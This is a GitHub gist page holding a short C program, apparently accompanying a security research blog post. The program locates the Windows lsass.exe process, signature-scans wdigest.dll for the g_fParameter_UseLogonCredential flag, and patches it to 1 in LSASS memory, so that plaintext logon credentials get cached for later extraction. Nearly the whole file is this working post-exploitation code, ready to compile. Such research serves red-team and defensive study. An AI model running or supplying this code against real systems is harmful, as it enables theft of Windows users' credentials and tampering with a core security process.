Skip to content

Instantly share code, notes, and snippets.

@xpn xpn/wdigest_on.c Secret
Created May 8, 2019

Embed
What would you like to do?
#blog
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
// Signature for inst to cmp dword ptr [wdigest!g_fParameter_UseLogonCredential],ebx
unsigned char signature[] = { 0xf7, 0x47, 0x50, 0x00, 0x08, 0x00, 0x00, 0x0f, 0x85, 0xfe, 0x71, 0x00, 0x00, 0x39, 0x1d };
// Open a handle to the LSASS process
HANDLE GrabLsassHandle(int pid) {
HANDLE procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, pid);
return procHandle;
}
// Write memory to LSASS process
SIZE_T WriteToLsass(HANDLE hLsass, void* addr, void *memIn, int memInLen) {
SIZE_T bytesWritten = 0;
WriteProcessMemory(hLsass, addr, memIn, memInLen, &bytesWritten);
return bytesWritten;
}
// Searches for lsass.exe PID
int GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(hSnapshot, &entry)) {
while (Process32Next(hSnapshot, &entry)) {
if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
return entry.th32ProcessID;
}
}
}
CloseHandle(hSnapshot);
return 0;
}
int ToggleWDigest(HANDLE hLsass) {
unsigned char* ptr = 0;
ULONG value = 1;
ptr = (unsigned char*)LoadLibraryA("wdigest.dll");
if (ptr == NULL) {
printf("[x] Error: Could not load wdigest.dll into process\n");
return 1;
}
printf("[*] Searching for g_fParameter_UseLogonCredential\n");
for (int i = 0; i < 0x220000; i++) {
if (ptr[i] == signature[0] && ptr[i + 1] == signature[1]) {
if (memcmp(ptr + i, signature, sizeof(signature)) == 0) {
ptr += i + sizeof(signature);
ptr += (*(DWORD*)ptr) + 4;
break;
}
}
}
if (ptr == (unsigned char*)0) {
printf("[x] Error: Could not find signature in wdigest.dll\n");
return 1;
}
printf("[*] Found g_fParameter_UseLogonCredential at %p\n", ptr);
printf("[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n");
// No need to check in lsass, as Windows ASLR loads at the same address across processes
WriteToLsass(hLsass, ptr, &value, sizeof(value));
printf("[*] Done... wdigest credential caching should now be on\n");
}
int main()
{
int lsassPid;
HANDLE hLsass;
printf("[ WDigest Toggle ]\n");
printf(" @_xpn_\n\n");
lsassPid = GetLsassPid();
if (lsassPid == 0) {
printf("[x] Error: Could not find lsass.exe process\n");
return 1;
}
hLsass = GrabLsassHandle(lsassPid);
if (hLsass == INVALID_HANDLE_VALUE) {
printf("[x] Error: Could not open lsass.exe\n");
return 1;
}
ToggleWDigest(hLsass);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.